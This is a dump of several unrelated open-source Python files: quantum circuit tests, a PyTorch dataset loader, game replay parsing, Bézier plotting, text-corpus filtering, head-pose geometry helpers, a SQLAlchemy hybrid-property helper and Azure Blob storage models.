self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_bit_reg(self):
instruction_set = self.circuit.cz(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_bit_reg_inv(self):
instruction_set = self.circuit.cz(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap_reg_reg(self):
instruction_set = self.circuit.swap(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'swap')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap_reg_reg_inv(self):
instruction_set = self.circuit.swap(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'swap')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
class TestStandard3Q(QiskitTestCase):
"""Standard Extension Test. Gates with three Qubits"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.qr3 = QuantumRegister(3, "s")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.qr3, self.cr)
def test_ccx_reg_reg_reg(self):
instruction_set = self.circuit.ccx(self.qr, self.qr2, self.qr3)
self.assertEqual(instruction_set.instructions[0].name, 'ccx')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ccx_reg_reg_inv(self):
instruction_set = self.circuit.ccx(self.qr, self.qr2, self.qr3).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ccx')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cswap_reg_reg_reg(self):
instruction_set = self.circuit.cswap(self.qr, self.qr2, self.qr3)
self.assertEqual(instruction_set.instructions[0].name, 'cswap')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cswap_reg_reg_inv(self):
instruction_set = self.circuit.cswap(self.qr, self.qr2, self.qr3).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cswap')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | 1a40c48db9a8c6970532f6d51f59a5a86173e94f | import torch
from torch.utils.data import Dataset
import os
import pickle
class ToxicData(Dataset):
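    """Map-style dataset pairing pickled source sequences (truncated to max_len) with their targets."""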
def __init__(self, root, dcat, max_len) -> None:
super(ToxicData, self).__init__()
src_path = os.path.join(root, dcat + '/src.pkl')
tgt_path = os.path.join(root, dcat + '/tgt.pkl')
self.src = pickle.load(open(src_path, 'rb'))
self.tgt = pickle.load(open(tgt_path, 'rb'))
self.max_len = max_len
def __getitem__(self, index):
input = torch.tensor(self.src[index][:self.max_len])
output = torch.tensor(self.tgt[index])
return input, output
def __len__(self):
return len(self.src)
|
py | 1a40c4e88d57df4d7e03317905cc64cc1df64e06 | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import typing
import oneflow._oneflow_internal
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.framework import id_util as id_util
def api_fused_self_attention_query_mul_key_and_value(
x: oneflow._oneflow_internal.BlobDesc,
head_size: int,
alpha: float = 1.0,
name: typing.Optional[str] = None,
) -> oneflow._oneflow_internal.BlobDesc:
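    """Build and run the fused_self_attention_query_mul_key_and_value user op on the
    hidden-states blob x, returning its (query_mul_key, value) output blobs."""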
if name is None:
name = id_util.UniqueStr("FusedSelfAttentionQueryMulKeyAndValue_")
op = (
flow.user_op_builder(name)
.Op("fused_self_attention_query_mul_key_and_value")
.Input("hidden_states", [x])
.Attr("head_size", int(head_size))
.Attr("alpha", float(alpha))
.Output("query_mul_key")
.Output("value")
.Build()
)
(qmk, v) = op.InferAndTryRun().RemoteBlobList()
return (qmk, v)
|
py | 1a40c59ed102cbbc910818f2604aef4be0f3cd8d | import copy
import json
import os
import os.path
import zstd
import hlt
ARBITRARY_ID = -1
def parse_replay_file(file_name, player_name):
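    """Parse a zstd-compressed Halite replay for the named player and return, per turn, a tuple of
    (game map frame, player moves, player ships, opponent ships, player dropoffs, opponent dropoffs)."""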
print("Load Replay: " + file_name)
with open(file_name, 'rb') as f:
data = json.loads(zstd.loads(f.read()))
print("Load Basic Information")
player = [p for p in data['players'] if p['name'].split(" ")[0] == player_name][0]
player_id = int(player['player_id'])
my_shipyard = hlt.Shipyard(player_id, ARBITRARY_ID,
hlt.Position(player['factory_location']['x'], player['factory_location']['y']))
other_shipyards = [
hlt.Shipyard(p['player_id'], ARBITRARY_ID, hlt.Position(p['factory_location']['x'], p['factory_location']['y']))
for p in data['players'] if int(p['player_id']) != player_id]
width = data['production_map']['width']
height = data['production_map']['height']
print("Load Cell Information")
first_cells = []
for x in range(len(data['production_map']['grid'])):
row = []
for y in range(len(data['production_map']['grid'][x])):
row += [hlt.MapCell(hlt.Position(x, y), data['production_map']['grid'][x][y]['energy'])]
first_cells.append(row)
frames = []
for f in data['full_frames']:
prev_cells = first_cells if len(frames) == 0 else frames[-1]._cells
new_cells = copy.deepcopy(prev_cells)
for c in f['cells']:
new_cells[c['y']][c['x']].halite_amount = c['production']
frames.append(hlt.GameMap(new_cells, width, height))
print("Load Player Ships")
moves = [{} if str(player_id) not in f['moves'] else {m['id']: m['direction'] for m in f['moves'][str(player_id)] if
m['type'] == "m"} for f in data['full_frames']]
ships = [{} if str(player_id) not in f['entities'] else {
int(sid): hlt.Ship(player_id, int(sid), hlt.Position(ship['x'], ship['y']), ship['energy']) for sid, ship in
f['entities'][str(player_id)].items()} for f in data['full_frames']]
print("Load Other Player Ships")
other_ships = [
{int(sid): hlt.Ship(int(pid), int(sid), hlt.Position(ship['x'], ship['y']), ship['energy']) for pid, p in
f['entities'].items() if
int(pid) != player_id for sid, ship in p.items()} for f in data['full_frames']]
print("Load Droppoff Information")
first_my_dropoffs = [my_shipyard]
first_them_dropoffs = other_shipyards
my_dropoffs = []
them_dropoffs = []
for f in data['full_frames']:
new_my_dropoffs = copy.deepcopy(first_my_dropoffs if len(my_dropoffs) == 0 else my_dropoffs[-1])
new_them_dropoffs = copy.deepcopy(first_them_dropoffs if len(them_dropoffs) == 0 else them_dropoffs[-1])
for e in f['events']:
if e['type'] == 'construct':
if int(e['owner_id']) == player_id:
new_my_dropoffs.append(
hlt.Dropoff(player_id, ARBITRARY_ID, hlt.Position(e['location']['x'], e['location']['y'])))
else:
new_them_dropoffs.append(
hlt.Dropoff(e['owner_id'], ARBITRARY_ID, hlt.Position(e['location']['x'], e['location']['y'])))
my_dropoffs.append(new_my_dropoffs)
them_dropoffs.append(new_them_dropoffs)
return list(zip(frames, moves, ships, other_ships, my_dropoffs, them_dropoffs))
def parse_replay_folder(folder_name, player_name, max_files=None):
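    """Parse every .hlt replay in folder_name for player_name, stopping after max_files replays if given."""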
replay_buffer = []
for file_name in sorted(os.listdir(folder_name)):
if not file_name.endswith(".hlt"):
continue
elif max_files is not None and len(replay_buffer) >= max_files:
break
else:
replay_buffer.append(parse_replay_file(os.path.join(folder_name, file_name), player_name))
return replay_buffer
|
py | 1a40c678accb7ef43346ed0387d30499f5305586 | # Autores:
# Diego Carballido Álvarez ([email protected])
# José Antonio Figueiras Martínez ([email protected])
import matplotlib.pyplot as plt
import numpy as np
# Recursive de Casteljau evaluation of the Bézier curve
def B(coorArr, i, j, t):
if j == 0:
return coorArr[i]
return B(coorArr, i, j - 1, t) * (1 - t) + B(coorArr, i + 1, j - 1, t) * t
# Control points
P=np.array([[0.75, 1.5],[1., 1.],[2.,1.],[2.75,1.],[3.,1.5],[3.1,1.75],
[3.,2.],[2.75,2.5],[2.,2.5],[1.,2.5],[0.75,2.],[0.75,1.75],
[0.75,1.5],[0.75,1.],[1.,0.5],[1.5,0.],[2.,0.],[2.75,0.],[3.,0.25]])
fig=plt.figure("Letra e")
ini=0; fin=3
# One iteration of the for loop per curve (each curve uses 3 control points and shares an endpoint with the previous one)
for k in range(0,9):
x=P[ini:fin,0]
y=P[ini:fin,1]
n=x.size
xb=[]
yb=[]
for t in np.linspace(0.,1.,25):
a = B(x, 0, n - 1, t)
b = B(y, 0, n - 1, t)
xb.append(a)
yb.append(b)
plt.plot(xb,yb)
ini=fin-1
fin=ini+n
plt.plot(P[:,0],P[:,1],'c--',P[:,0],P[:,1],'ko',ms=8)
plt.xticks([])
plt.yticks([])
plt.axis('off')
plt.axis([min(P[:,0])-0.065,max(P[:,0])+.05,min(P[:,1])-0.05,max(P[:,1])+0.05])
plt.show() |
py | 1a40c7a6eef6ff0d39dc2ec8e88d2eb9f079b4eb | import re
import glob
import pandas as pd
from . import clean
class Corpus(object):
"""Docstring"""
def __init__(self, docs_paths):
self.corpus = []
self.docs_names = docs_paths
def load(self):
"""
:return A list of Strings each one being a document
"""
for file_name in self.docs_names:
with open(file_name, 'r') as fh:
new_discussion = {}
text = fh.read().split("\n\n")
new_discussion["id"] = file_name[-12:-4]
new_discussion["question_title"] = text[0]
new_discussion["question_body"] = text[1]
new_discussion["answers"] = text[2:]
self.corpus.append(new_discussion)
def get_discussions_text(self):
"""docstring"""
return [
" ".join([
doc["question_title"],
doc["question_body"],
" ".join(doc["answers"])]
)
for doc in self.corpus
]
def corpus_word_frequency(self):
"""docstring"""
corpus_text = self.get_discussions_text()
bag_of_words = " ".join(corpus_text).split()
tokens = set(bag_of_words)
words_frequency = {}
for doc in corpus_text:
text = doc.split()
for word in tokens:
if word in text:
if word in words_frequency.keys():
words_frequency[word] += 1
else:
words_frequency[word] = 1
return words_frequency
def export_pruned(self, limits, destination):
"""docstring"""
if not self.corpus:
print("A corpus need to be loaded first")
return
upper_pruning = None
lower_pruning = None
word_count = self.corpus_word_frequency()
word_count_df = pd.DataFrame.from_dict(
word_count, orient="index", columns=["w_count"])
if "upper" in limits.keys():
upper_pruning = word_count_df.loc[
word_count_df.w_count > limits["upper"]
]
if "lower" in limits.keys():
lower_pruning = word_count_df.loc[
word_count_df.w_count < limits["lower"]
]
print(list(upper_pruning.index))
for doc in self.corpus:
file_name = destination + "instance_" + doc["id"] + ".txt"
question_title = doc["question_title"]
question_body = doc["question_body"]
answers = doc["answers"]
if "upper" in limits.keys():
question_title = " ".join(
[word for word in question_title.split()
if word not in list(upper_pruning.index)])
question_body = " ".join(
[word for word in question_body.split()
if word not in list(upper_pruning.index)])
answers = [
[word for word in answer.split()
if word not in list(upper_pruning.index)]
for answer in answers
]
answers = [" ".join(txt) for txt in answers if txt]
if "lower" in limits.keys():
question_title = " ".join(
[word for word in question_title.split()
if word not in list(lower_pruning.index)])
question_body = " ".join(
[word for word in question_body.split()
if word not in list(lower_pruning.index)])
answers = [
[word for word in answer.split()
if word not in list(lower_pruning.index)]
for answer in answers
]
answers = [" ".join(txt) for txt in answers if txt]
with open(file_name, 'w') as fh:
fh.write(question_title)
fh.write("\n\n" + question_body)
for answer in answers:
fh.write("\n\n" + answer)
print("Writen " + doc["id"])
return upper_pruning, lower_pruning
# TODO DEPRECATED
# def remove_single_quotes(word):
# word = word.strip()
# if word[0] == "'" and word[-1] == "'":
# word = word[1:-1]
# return word
def remove_block_tag(tags_exp, text):
"""
    Receives a text and a pair of opening/closing tags (given as regexes)
    and removes every occurrence of the tags together with the text
    enclosed between them.
"""
tag_open, tag_close = tags_exp[0], tags_exp[1]
while True:
start_match = re.search(tag_open, text)
end_match = re.search(tag_close, text)
if not (start_match and end_match):
break
text = text[:start_match.start()] + " " + text[end_match.end():]
return text
def remove_single_tag(tag_exp, text):
"""
Receives a tag as regex and remove all occurrences in the text.
"""
while True:
matched = re.search(tag_exp, text)
if not matched: break
text = text[:matched.start()] + " " + text[matched.end():]
return text
def filter_by_words(questions_df, answers_df, simple_words, compound_words):
""" docstring """
matched_ids = []
not_matched_ids = []
simple_word_set = set(simple_words)
punctuation_rgx = r"[^()[\]<>+\-_=\*|\^{}$&%#@!?.,:;/\"]+"
for index, row in questions_df.iterrows():
print(index)
found_flag = False
title = row.Title.lower()
in_title_compound = [
True if re.compile(compound_word).search(title) else False
for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, title)
clean_text = [word for line in clean_text for word in line.split()]
clean_text = list(map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(set(clean_text))
in_title_simple = [True] * len(simple_matched)
in_title = in_title_compound + in_title_simple
if any(in_title):
found_flag = True
else:
body = row.Body.lower()
in_body_compound = [
True if re.compile(compound_word).search(body) else False
for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, body)
clean_text = [word for line in clean_text for word in line.split()]
clean_text = list(map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(set(clean_text))
in_body_simple = [True] * len(simple_matched)
in_body = in_body_compound + in_body_simple
if any(in_body):
found_flag = True
else:
answers = answers_df.loc[answers_df.ParentId == row.Id]
for idx, line in answers.iterrows():
answer = line.Body.lower()
in_answers_compound = [
True if re.compile(compound_word).search(answer) else
False for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, answer)
clean_text = [
word for line in clean_text for word in line.split()]
clean_text = list(
map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(
set(clean_text))
in_answers_simple = [True] * len(simple_matched)
in_answers = in_answers_compound + in_answers_simple
if any(in_answers):
found_flag = True
break
if found_flag:
matched_ids.append(row.Id)
else:
not_matched_ids.append(row.Id)
return matched_ids, not_matched_ids
|
py | 1a40c83b0ce0c87fbd581a10b673fbf25d24f13e | import numpy as np
from math import cos, sin, pi
import math
import cv2
from scipy.spatial import Delaunay
def softmax(x):
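    # Numerically stable row-wise softmax: subtract each row's max before exponentiating.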
x -= np.max(x,axis=1, keepdims=True)
a = np.exp(x)
b = np.sum(np.exp(x), axis=1, keepdims=True)
return a/b
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 100):
# Referenced from HopeNet https://github.com/natanielruiz/deep-head-pose
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),2)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),2)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def projectPoints(X, K, R, t, Kd):
""" Projects points X (3xN) using camera intrinsics K (3x3),
extrinsics (R,t) and distortion parameters Kd=[k1,k2,p1,p2,k3].
Roughly, x = K*(R*X + t) + distortion
See http://docs.opencv.org/2.4/doc/tutorials/calib3d/camera_calibration/camera_calibration.html
or cv2.projectPoints
"""
x = np.asarray(R * X + t)
x[0:2, :] = x[0:2, :] / x[2, :]
r = x[0, :] * x[0, :] + x[1, :] * x[1, :]
x[0, :] = x[0, :] * (1 + Kd[0] * r + Kd[1] * r * r + Kd[4] * r * r * r) + 2 * Kd[2] * x[0, :] * x[1, :] + Kd[3] * (
r + 2 * x[0, :] * x[0, :])
x[1, :] = x[1, :] * (1 + Kd[0] * r + Kd[1] * r * r + Kd[4] * r * r * r) + 2 * Kd[3] * x[0, :] * x[1, :] + Kd[2] * (
r + 2 * x[1, :] * x[1, :])
x[0, :] = K[0, 0] * x[0, :] + K[0, 1] * x[1, :] + K[0, 2]
x[1, :] = K[1, 0] * x[0, :] + K[1, 1] * x[1, :] + K[1, 2]
return x
def align(model, data):
"""Align two trajectories using the method of Horn (closed-form).
https://github.com/raulmur/evaluate_ate_scale
Input:
model -- first trajectory (3xn)
data -- second trajectory (3xn)
Output:
rot -- rotation matrix (3x3)
trans -- translation vector (3x1)
trans_error -- translational error per point (1xn)
"""
np.set_printoptions(precision=3, suppress=True)
model_zerocentered = model - model.mean(1)
data_zerocentered = data - data.mean(1)
W = np.zeros((3, 3))
for column in range(model.shape[1]):
W += np.outer(model_zerocentered[:, column], data_zerocentered[:, column])
U, d, Vh = np.linalg.linalg.svd(W.transpose())
S = np.matrix(np.identity(3))
if (np.linalg.det(U) * np.linalg.det(Vh) < 0):
S[2, 2] = -1
rot = U * S * Vh
rotmodel = rot * model_zerocentered
dots = 0.0
norms = 0.0
for column in range(data_zerocentered.shape[1]):
dots += np.dot(data_zerocentered[:, column].transpose(), rotmodel[:, column])
normi = np.linalg.norm(model_zerocentered[:, column])
norms += normi * normi
s = float(dots / norms)
trans = data.mean(1) - s * rot * model.mean(1)
model_aligned = s * rot * model + trans
alignment_error = model_aligned - data
trans_error = np.sqrt(np.sum(np.multiply(alignment_error, alignment_error), 0)).A[0]
return rot, trans, trans_error, s
def rotationMatrixToEulerAngles2(R):
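    # Return two candidate (x, y, z) Euler-angle solutions decoded from rotation matrix R.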
y1 = -math.asin(R[2,0])
y2 = math.pi - y1
if y1>math.pi:
y1 = y1 - 2*math.pi
if y2>math.pi:
y2 = y2 - 2*math.pi
x1 = math.atan2(R[2,1]/math.cos(y1), R[2,2]/math.cos(y1))
x2 = math.atan2(R[2,1]/math.cos(y2), R[2,2]/math.cos(y2))
z1 = math.atan2(R[1,0]/math.cos(y1), R[0,0]/math.cos(y1))
z2 = math.atan2(R[1, 0] / math.cos(y2), R[0, 0] / math.cos(y2))
return [x1, y1, z1], [x2, y2, z2]
def reference_head(scale=0.01,pyr=(10.,0.0,0.0)):
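    # Canonical 3D head-landmark template: scaled, rotated by (pitch, yaw, roll) in degrees,
    # and triangulated (Delaunay on the x-y projection) for later rendering/fitting.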
kps = np.asarray([[-7.308957, 0.913869, 0.000000], [-6.775290, -0.730814, -0.012799],
[-5.665918, -3.286078, 1.022951], [-5.011779, -4.876396, 1.047961],
[-4.056931, -5.947019, 1.636229], [-1.833492, -7.056977, 4.061275],
[0.000000, -7.415691, 4.070434], [1.833492, -7.056977, 4.061275],
[4.056931, -5.947019, 1.636229], [5.011779, -4.876396, 1.047961],
[5.665918, -3.286078, 1.022951],
[6.775290, -0.730814, -0.012799], [7.308957, 0.913869, 0.000000],
[5.311432, 5.485328, 3.987654], [4.461908, 6.189018, 5.594410],
[3.550622, 6.185143, 5.712299], [2.542231, 5.862829, 4.687939],
[1.789930, 5.393625, 4.413414], [2.693583, 5.018237, 5.072837],
[3.530191, 4.981603, 4.937805], [4.490323, 5.186498, 4.694397],
[-5.311432, 5.485328, 3.987654], [-4.461908, 6.189018, 5.594410],
[-3.550622, 6.185143, 5.712299], [-2.542231, 5.862829, 4.687939],
[-1.789930, 5.393625, 4.413414], [-2.693583, 5.018237, 5.072837],
[-3.530191, 4.981603, 4.937805], [-4.490323, 5.186498, 4.694397],
[1.330353, 7.122144, 6.903745], [2.533424, 7.878085, 7.451034],
[4.861131, 7.878672, 6.601275], [6.137002, 7.271266, 5.200823],
[6.825897, 6.760612, 4.402142], [-1.330353, 7.122144, 6.903745],
[-2.533424, 7.878085, 7.451034], [-4.861131, 7.878672, 6.601275],
[-6.137002, 7.271266, 5.200823], [-6.825897, 6.760612, 4.402142],
[-2.774015, -2.080775, 5.048531], [-0.509714, -1.571179, 6.566167],
[0.000000, -1.646444, 6.704956], [0.509714, -1.571179, 6.566167],
[2.774015, -2.080775, 5.048531], [0.589441, -2.958597, 6.109526],
[0.000000, -3.116408, 6.097667], [-0.589441, -2.958597, 6.109526],
[-0.981972, 4.554081, 6.301271], [-0.973987, 1.916389, 7.654050],
[-2.005628, 1.409845, 6.165652], [-1.930245, 0.424351, 5.914376],
[-0.746313, 0.348381, 6.263227], [0.000000, 0.000000, 6.763430],
[0.746313, 0.348381, 6.263227], [1.930245, 0.424351, 5.914376],
[2.005628, 1.409845, 6.165652], [0.973987, 1.916389, 7.654050],
[0.981972, 4.554081, 6.301271]]).T
R = rotate_zyx( np.deg2rad(pyr) )
kps = transform( R, kps*scale )
tris = Delaunay( kps[:2].T ).simplices.copy()
return kps, tris
def rotate_zyx(theta):
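    # Build a 4x4 homogeneous rotation matrix from Euler angles theta = (x, y, z) in radians.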
sx, sy, sz = np.sin(theta)
cx, cy, cz = np.cos(theta)
return np.array([
[cy * cz, cy * sz, -sy, 0],
[-cx * sz + cz * sx * sy, cx * cz + sx * sy * sz, cy * sx, 0],
[cx * cz * sy + sx * sz, cx * sy * sz - cz * sx, cx * cy, 0],
[0, 0, 0, 1]], dtype=float)
def transform( E, p ):
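    # Apply the rigid transform E (3x3 rotation block plus translation) to a point or a 3xN array of points.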
p = np.array(p)
if p.ndim > 1:
return E[:3,:3]@p + E[:3,3,None]
return E[:3,:3]@p + E[:3,3]
def get_sphere(theta, phi, row):
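    # Spherical-to-Cartesian conversion; theta and phi are in degrees and row is the radius.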
theta = theta / 180. * pi
phi = phi/ 180. * pi
x = row * cos(theta) * sin(phi)
y = row * sin(theta) * sin(phi)
z = row * cos(phi)
return x, y, z
def select_euler(two_sets):
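    # Choose the physically plausible (pitch, yaw, roll) solution from the two Euler decompositions,
    # i.e. the one with |pitch| < 90 and |roll| < 90 after wrapping yaw into (-180, 180].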
pitch, yaw, roll= two_sets[0]
pitch2, yaw2, roll2 = two_sets[1]
if yaw>180.:
yaw = yaw - 360.
if yaw2>180.:
yaw2 = yaw2 - 360.
if abs(roll)<90 and abs(pitch)<90:
return True, [pitch, yaw, roll]
elif abs(roll2)<90 and abs(pitch2)<90:
return True, [pitch2, yaw2, roll2]
else:
return False, [-999, -999, -999]
def inverse_rotate_zyx(M):
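    # Recover both Euler-angle solutions (x, y, z) from rotation matrix M, handling the gimbal-lock case explicitly.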
if np.linalg.norm(M[:3, :3].T @ M[:3, :3] - np.eye(3)) > 1e-5:
raise ValueError('Matrix is not a rotation')
if np.abs(M[0, 2]) > 0.9999999:
# gimbal lock
z = 0.0
# M[1,0] = cz*sx*sy
# M[2,0] = cx*cz*sy
if M[0, 2] > 0:
y = -np.pi / 2
x = np.arctan2(-M[1, 0], -M[2, 0])
else:
y = np.pi / 2
x = np.arctan2(M[1, 0], M[2, 0])
return np.array((x, y, z)), np.array((x, y, z))
else:
# no gimbal lock
y0 = np.arcsin(-M[0, 2])
y1 = np.pi - y0
cy0 = np.cos(y0)
cy1 = np.cos(y1)
x0 = np.arctan2(M[1, 2] / cy0, M[2, 2] / cy0)
x1 = np.arctan2(M[1, 2] / cy1, M[2, 2] / cy1)
z0 = np.arctan2(M[0, 1] / cy0, M[0, 0] / cy0)
z1 = np.arctan2(M[0, 1] / cy1, M[0, 0] / cy1)
return np.array((x0, y0, z0)), np.array((x1, y1, z1))
|
py | 1a40c8b6db88c31c30d65d6eb8e514e909007a68 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 5 14:31:00 2016
@author: mtkessel
"""
import matplotlib.pyplot as plt
from numpy.random import random, randint
import pandas as pd
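# Minimal timeline: plot each date as a colored square along a single horizontal axis, hiding the y-axis.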
dates = [
1665,
1674,
1838,
1839,
1855]
values = [1,2,3,4,5]
X = dates #pd.to_datetime(dates)
fig, ax = plt.subplots(figsize=(6,1))
ax.scatter(X, [1]*len(X), c=values,
marker='s', s=100)
fig.autofmt_xdate()
# everything after this is turning off stuff that's plotted by default
ax.yaxis.set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.xaxis.set_ticks_position('bottom')
ax.get_yaxis().set_ticklabels([])
day = 10 #pd.to_timedelta("1", unit='D')
plt.xlim(X[0] - day, X[-1] + day)
plt.show()
|
py | 1a40c908fbae5777e7a4721651d606f37aa3bd1e | from __future__ import annotations
from typing import Any, Callable
from sqlalchemy.ext.hybrid import hybrid_property
from .expression import Expression
from .resolver import AttributeResolver, PrefetchedAttributeResolver
from .typing import ColumnDefaults
class DerivedColumn:
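    """Exposes an Expression as a SQLAlchemy hybrid_property; when a default is given
    (single-column expressions only), a boolean flag-style setter is generated as well."""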
def __init__(
self,
expression: Expression,
default: Any = None,
prefetch_attribute_names: bool = True,
):
self.expression = expression
self.default = default
if not prefetch_attribute_names:
self.resolver = AttributeResolver(expression.columns)
else:
self.resolver = PrefetchedAttributeResolver(expression.columns)
if len(self.expression.columns) > 1 and self.default is not None:
raise TypeError("Cannot use default for multi-column expression.")
def _default_functions(self) -> ColumnDefaults:
setter = self.default
if not callable(setter):
setter = lambda: self.default # noqa
return {True: setter, False: lambda: None}
def make_getter(self) -> Callable[[Any], Any]:
"""Returns a getter function, evaluating the expression in bound scope."""
evaluate = self.expression.evaluate
values = self.resolver.values
return lambda orm_obj: evaluate(values(orm_obj))
def make_setter(self) -> Callable[[Any, Any], None]:
"""Returns a setter function setting default values based on given booleans."""
defaults = self._default_functions()
target_name = self.resolver.single_name
def _fset(self: Any, value: Any) -> None:
if not isinstance(value, bool):
raise TypeError("Flag only accepts boolean values")
setattr(self, target_name(self), defaults[value]())
return _fset
def create_hybrid(self) -> hybrid_property:
return hybrid_property(
fget=self.make_getter(),
fset=self.make_setter() if self.default is not None else None,
expr=lambda cls: self.expression.sql,
)
|
py | 1a40c97b64300cee7fcc95e8ac77a5f3c0e5cf97 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from azure.core.exceptions import HttpResponseError
class AccessPolicy(Model):
"""An Access policy.
:param start: the date-time the policy is active
:type start: str
:param expiry: the date-time the policy expires
:type expiry: str
:param permission: the permissions for the acl policy
:type permission: str
"""
_attribute_map = {
'start': {'key': 'Start', 'type': 'str', 'xml': {'name': 'Start'}},
'expiry': {'key': 'Expiry', 'type': 'str', 'xml': {'name': 'Expiry'}},
'permission': {'key': 'Permission', 'type': 'str', 'xml': {'name': 'Permission'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(AccessPolicy, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.expiry = kwargs.get('expiry', None)
self.permission = kwargs.get('permission', None)
class AppendPositionAccessConditions(Model):
"""Additional parameters for a set of operations, such as:
AppendBlob_append_block, AppendBlob_append_block_from_url, AppendBlob_seal.
:param max_size: Optional conditional header. The max length in bytes
permitted for the append blob. If the Append Block operation would cause
the blob to exceed that limit or if the blob size is already greater than
the value specified in this header, the request will fail with
MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition
Failed).
:type max_size: long
:param append_position: Optional conditional header, used only for the
Append Block operation. A number indicating the byte offset to compare.
Append Block will succeed only if the append position is equal to this
number. If it is not, the request will fail with the
AppendPositionConditionNotMet error (HTTP status code 412 - Precondition
Failed).
:type append_position: long
"""
_attribute_map = {
'max_size': {'key': '', 'type': 'long', 'xml': {'name': 'max_size'}},
'append_position': {'key': '', 'type': 'long', 'xml': {'name': 'append_position'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(AppendPositionAccessConditions, self).__init__(**kwargs)
self.max_size = kwargs.get('max_size', None)
self.append_position = kwargs.get('append_position', None)
class BlobFlatListSegment(Model):
"""BlobFlatListSegment.
All required parameters must be populated in order to send to Azure.
:param blob_items: Required.
:type blob_items: list[~azure.storage.blob.models.BlobItemInternal]
"""
_validation = {
'blob_items': {'required': True},
}
_attribute_map = {
'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'BlobItems', 'itemsName': 'Blob'}},
}
_xml_map = {
'name': 'Blobs'
}
def __init__(self, **kwargs):
super(BlobFlatListSegment, self).__init__(**kwargs)
self.blob_items = kwargs.get('blob_items', None)
class BlobHierarchyListSegment(Model):
"""BlobHierarchyListSegment.
All required parameters must be populated in order to send to Azure.
:param blob_prefixes:
:type blob_prefixes: list[~azure.storage.blob.models.BlobPrefix]
:param blob_items: Required.
:type blob_items: list[~azure.storage.blob.models.BlobItemInternal]
"""
_validation = {
'blob_items': {'required': True},
}
_attribute_map = {
'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix', 'itemsName': 'BlobPrefix'}},
'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}},
}
_xml_map = {
'name': 'Blobs'
}
def __init__(self, **kwargs):
super(BlobHierarchyListSegment, self).__init__(**kwargs)
self.blob_prefixes = kwargs.get('blob_prefixes', None)
